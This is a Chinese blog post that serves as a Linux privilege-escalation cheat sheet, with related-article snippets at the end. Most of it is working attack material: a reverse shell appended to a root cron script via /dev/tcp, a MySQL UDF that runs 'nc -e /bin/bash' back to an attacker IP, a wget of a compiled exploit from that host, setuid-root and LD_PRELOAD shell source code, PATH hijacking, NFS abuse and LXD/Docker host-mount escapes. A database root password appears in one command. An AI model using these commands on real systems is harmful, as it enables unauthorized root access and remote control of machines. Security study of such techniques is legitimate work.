liunx提权

于 2025-03-11 19:03:22 发布
阅读量1.1k 收藏 17
点赞数 14
文章标签: linux 提权 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jksking/article/details/146135872
版权

先导篇

Linux:

系统用户:UID(0-999)

普通用户:UID(1000-*)

root用户:UID为0,拥有系统的完全控制权限

webshell的用户名为:www-data

Linux提权:

1、内核溢出提权

2、suid、sudo、nfs、path、ld_preload、cron、lxd、capability、rbash等

3、数据库类型提权

内核溢出CVE漏洞(web提权)

1.信息收集

当前主机的操作系统

hostnamectl

cat /etc/*-release

lsb_release -a

cat /etc/lsb-release # Debain

cat /etc/redhat-release # Redhat

cat /etc/centos-release # Centos

cat /etc/os-release # Ubuntu

cat /etc/issue

当前主机的内核版本

hostnamectl

uname -a

cat /proc/version

dmesg | grep "Linux version"

2.内核漏洞筛选

1、MSF检测
use post/multi/recon/local_exploit_suggester

2、提权脚本(检测CVE漏洞提权)
https://github.com/liamg/traitor

https://github.com/The-Z-Labs/linux-exploit-suggester(常用 ./sh文件)

https://github.com/jondonas/linux-exploit-suggester-2(pl文件)

https://github.com/belane/linux-soft-exploit-suggester(py文件)

3、综合脚本(检测所有可以提权的点)
https://github.com/carlospolop/PEASS-ng

https://github.com/diego-treitos/linux-smart-enumeration

https://github.com/redcode-labs/Bashark

https://github.com/rebootuser/LinEnum

SUID权限&SUDO指令&版本漏洞(web&普通用户提权)

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

#利用参考:

https://gtfobins.github.io/

检测项目:

https://github.com/carlospolop/PEASS-ng

将sh文件上传运行,找到有 suid 或者 sudo 的文件 参考上方文档利用

SUID&GUID:web&普通用户权限提权

手工查找命令

chmod +s 文件名 #赋予SUID权限
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

SUDO:普通用户提权 

手工查找命令

cat /etc/sudoers
sudo -l
两个sudo的cve漏洞:

CVE-2019-14287,CVE-2019-13287

CRON&NFS&环境变量PATH

1.cron计划任务(web&普通用户)

原理:cron定时任务的权限是root,将反弹shell的执行代码写入定时任务中,然后等待触发

提升条件:Web或用户权限进行查看,任务文件可修改

cat /etc/crontab

cat /etc/script/CleaningScript.sh #查看脚本内容

ls -lia /etc/script/CleaningScript.sh #查看对任务文件的权限

echo "/bin/bash -i >& /dev/tcp/192.168.139.141/66 0>&1" >> /etc/script/CleaningScript.sh

#等待5分钟触发反弹shell

2.环境变量PATH(普通用户!)

原理:有SUID配置的文件A中执行了应用B,修改环境变量,使文件A运行到恶意文件

提升条件:存在SUID的应用中能可逆向出执行命令,加用户权限

find / -perm -u=s -type f 2>/dev/null #找有SUID配置的文件(优先个人创建文件)
strings /opt/statuscheck #查看这个用户自己创建的文件 

#在tmp目录创建一个curl文件
cd /tmp 
echo "/bin/sh" > curl
chmod 777 curl

#将tmp目录加入path
export PATH=/tmp:$PATH
echo $PATH

#然后执行/opt/statuscheck,这个文件有suid配置
#用这个文件触发 /bin/sh 得到root权限
/opt/statuscheck

3.NFS(web&普通用户)

参考:Linux 提权-NFS 共享_nfs提权-优快云博客

NFS(网络文件系统)是一种在端口2049上运行的网络文件共享协议,由服务器和客户端两个组件组成。NFS服务器上创建共享目录,可以通过网络与其他Linux客户端共享文件。获得权限的用户可以将文件添加到共享中,并与有权访问该目录的其他用户共享。
默认情况下,每个NFS共享都会启用root_squash功能,以防止共享文件拥有root:root身份或特殊权限(即启用root_squash后,所有共享文件都会变成nobody:nogroup身份)。但是,如果启用了no_root_squash功能,文件可以以root身份存在,这就容易导致权限升级。

原理:将目标的NFS跟本地NFS目录进行同步,然后上传有SUID配置的文件,文件中执行bash

提升条件:NFS服务开启和web或用户权限进行利用

1、信息收集:

nmap 192.168.1.6

http://192.168.1.6/file.php?file=/etc/passwd

2、NFS服务利用

#枚举 NFS 共享,找到共享文件夹,名字为nfs
showmount -e 192.168.1.6 
#nmap枚举,可以更详细的看见rwx权限
#nmap -sT -sV --script nfs* 192.168.1.6 -p111

#创建nfs文件夹,作为挂载点
mkdir nfs
#挂载共享文件夹nfs
mount -t nfs 192.168.1.6:/mnt/nfs ./nfs

#shell.php文件放在本机nfs文件夹中
#本地nfs文件夹中的文件,会同步到目标的nfs文件夹中
#给shell.php文件权限,然后尝试访问(目标网站有文件包含漏洞)
chmod 777 shell.php

3、配合SUID提权

注意gcc编译机器与目标机内核版本相似

写一个getroot.c文件

#include<stdlib.h>

#include<unistd.h>

int main()

{

setuid(0);

system("id");

system("/bin/bash");

}

gcc getroot.c -o getroot

cp getroot /root/nfs #复制bash到挂载目录下

chmod +s getroot #赋予suid权限

find / -perm -u=s -type f 2>/dev/null #再看看是否加入

cd /mnt/nfs # 目标机

./getroot # 目标机

数据库&Capability能力&LD_Preload加载

数据库提权(web&普通用户)

前提:webshell+MYSQL的root密码

原理:UDF提权,攻击者编写DLL或SO文件,将文件插入数据库表中,用数据库去执行文件.

1.信息收集

mysql -uroot -pR@v3nSecurity
select version();   #查看mysql版本
select @@basedir;   #确认mysql安装位置
show variables like '%basedir%';    #确认mysql安装位置
show variables like '%secure%';  #查看可导出文件位置
show variables like '%plugin%';   #查找插件位置
show variables like '%compile%';   #查看系统版本

2.根据收集的信息,编译EXO然后上传

#编译UDF.so
searchsploit udf
cp /usr/share/exploitdb/exploits/linux/local/1518.c .  #复制到当前所在文件夹
gcc -g -shared -Wl,-soname,1518.so -o udf.so 1518.c -lc
python -m http.server 8080
#下载到目标上
python -c 'import pty; pty.spawn("/bin/bash")'
cd tmp
wget http://192.168.139.141:8080/udf.so

3.利用

use mysql;
# 创建xiaodi表
create table xiaodi(line blob);
# 往xiaodi表中插入二进制的udf.so
insert into xiaodi values(load_file('/tmp/udf.so'));
# 导出udf.so
select * from xiaodi into dumpfile '/usr/lib/mysql/plugin/udf.so';
# 创建do_system自定义函数
create function do_system returns integer soname 'udf.so';
select do_system('nc 192.168.139.141 6666 -e /bin/bash');

Capability能力(webshell&普通用户)

原理参考:https://www.cnblogs.com/f-carey/p/16026088.html

Capability是将SUDO的权限进行细分,通过能力有哪些权限设置进行利用

本机测试:

cp /usr/bin/php /tmp/php

设置能力:setcap cap_setuid+ep /tmp/php

删除能力:setcap -r /tmp/php

查看单个能力:getcap /usr/bin/php

查看所有能力:getcap -r / 2>/dev/null #信息收集

WP参考:https://www.jianshu.com/p/60673ac0454f

LD_Preload加载(普通用户)

LD_PRELOAD 是 Linux 系统中的一个环境变量,它可以影响程序的运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库 
sudo -l #找到sudo文件,假设是LinEum.sh
#LinEum.sh 是一个用户自定义的文件
#我们不知道他的作用,无法直接用sudo提权

写一个shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

​​​​​编译

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so

SUDO提权

sudo LD_PRELOAD=/tmp/shell.so /tmp/LinEnum.sh

Rbash绕过&Docker&LXD镜像&History泄漏

LXD容器

原理:

LXD是基于LXC容器的管理程序,当前用户可操作容器,理解为用户创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果。

lxd本地提权条件:

-已经获得Shell

-用户属于lxd组

#检测及利用:
./LinEnum.sh
https://github.com/saghul/lxd-alpine-builder

#创建容器,挂载磁盘,进入容器,进入目录提权
lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test
lxc init test test -c security.privileged=true
lxc config device add test test disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test /bin/sh

cd /mnt/root/root
cat flag.txt

Docker容器

原理:创建容器,将宿主机目录挂载到容器中的/mnt下

Docker本地提权条件:

1、已经获得Shell

2、用户属于docker组

#检测及利用:
./LinEnum.sh
#创建容器,挂载磁盘,进入容器,进入目录提权
docker run -v /:/mnt -it alpine
cd /mnt/root

其他提权情况:

检测工具:GitHub - cdk-team/CDK: 📦 Make security testing of K8s, Docker, and Containerd easier.

Rbash绕过

参考:

https://xz.aliyun.com/t/7642

[2] rbash绕过-优快云博客

Rbash(The Restricted mode of bash),也就是限制型bash,在渗透测试中可能遇到rbash,尝试绕过后才能进行后续操作(cd等命令无法执行)

例:

python -m http.server 8080
wget http://192.168.1.3:8080/LinEnum.sh
awk 'BEGIN {system("/bin/bash")}'

CCage
关注
webshell教程linux,LinuxWEBSHELL
weixin_42379854的博客
05-05 878
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前:1、目标机上安装了GCC能编译源码2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...
linux
weixin_44268185的博客
08-20 344
【代码】linux
webshellLINUX+留后门
weixin_30861797的博客
05-02 150
方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -...
linux webshell下信息收集和一些常用的命令
asli33的专栏
04-14 2137
w -查看当前在线用户. useradd – 创建用户. usermod – 修改用户属性. cut -d: -f1,2,3 /etc/passwd | grep :: – 查看无密码账号 id – 查看当前用户各种id. cat /etc/passwd – 查看系统账号. last -30 -最后登录的30个用户. ps aux – 查看运行进程. ifconfig {eth0 etc} – 查看网卡信息. sudo – 普通用户运行root限的命令,前是 /etc/sudoer
Linux漏洞快速检测工具unix-privesc-check
wzj的博客
05-01 1735
unix-privesc-check是Kali Linux自带的一款漏洞检测工具。它是一个Shell文件,可以检测所在系统的错误配置,用以发现可以的漏洞,该工具适用于安全审计、渗透测试和系统维护等场景。 示例: 1、标准模式扫描本地 unix-privesc-check standard 2、详细模式扫描本地 unix-privesc-check detailed 在输出中搜索单词“WARNING”。 如果你没看到,那么这个脚本没有发现任何问题。 ...
LinuxWEBSHELL一技
06-15
LinuxWEBSHELL一技 用phpshell2.0和配合ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
升-linux手法总结
01-14
### 升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux手法总结以及 Linuxexp集合
02-22
本文将深入探讨Linux的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root限。例如...
利用Metasploit进行Linux
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
Linux扫描脚本
04-28
这篇文档将深入探讨Linux扫描的相关知识点,包括原理、常见方法、扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、原理 在Linux系统中,限分为三类:用户限、组限和所有者限。...
linux 普通用户到root.docx
06-04
渗透中如何将Linux普通用户到root,首先创建一个普通用户,并且给普通用户设置一个密码,保证能用su 命令能用普通用户登
webshell的教程
04-03
webshell到的教程.part1.rar
最全的WEBSHELL方法总结
12-28
最全的WEBSHELL方法总结,非常的经典。网站入侵和网络安全必看
Linux】普通用户root限-虽然文章短,但是精悍
的博客
05-08 667
验证有没有sudo限。
webshell教程linux,Linux webshell反弹cmdline
weixin_34247523的博客
05-05 136
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
linuxroot限,linux命令–linux怎么普通帐号root限呢?
weixin_35949064的博客
04-30 148
linux怎么限如果拿 到linux普通帐号了怎么成root限ll -d /tmp/drwxrwxrwt. 31 root root 4096 Jun 5 18:51 /tmp/cd /tmp/mkdir exploitln /bin/ping /tmp/exploit/targetll !$exec 3< /tmp/exploit/targetll /proc/$$/fd/3rm ...
Linux
最新发布
weixin_43509478的博客
02-03 850
Linux系统上的内核管理系统内存和应用程序等组件之间的通信。此关键功能需要内核具有特定限;因此,成功利用此漏洞可能会获得 root 限。先说sudo和su的区别:sudo是用root的限去执行一个命令,su是切换成另外一个用户登录,sudo只需要有自己密码,和有sudo限执行这个命令即可。su需要有要登录用户的密码。有sudo限执行这个命令的意思是:当用户运行sudo命令时,Linux系统会在/etc/sudoers文件中查找当前用户,查看该用户是否有限通过sudo来执行这个命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值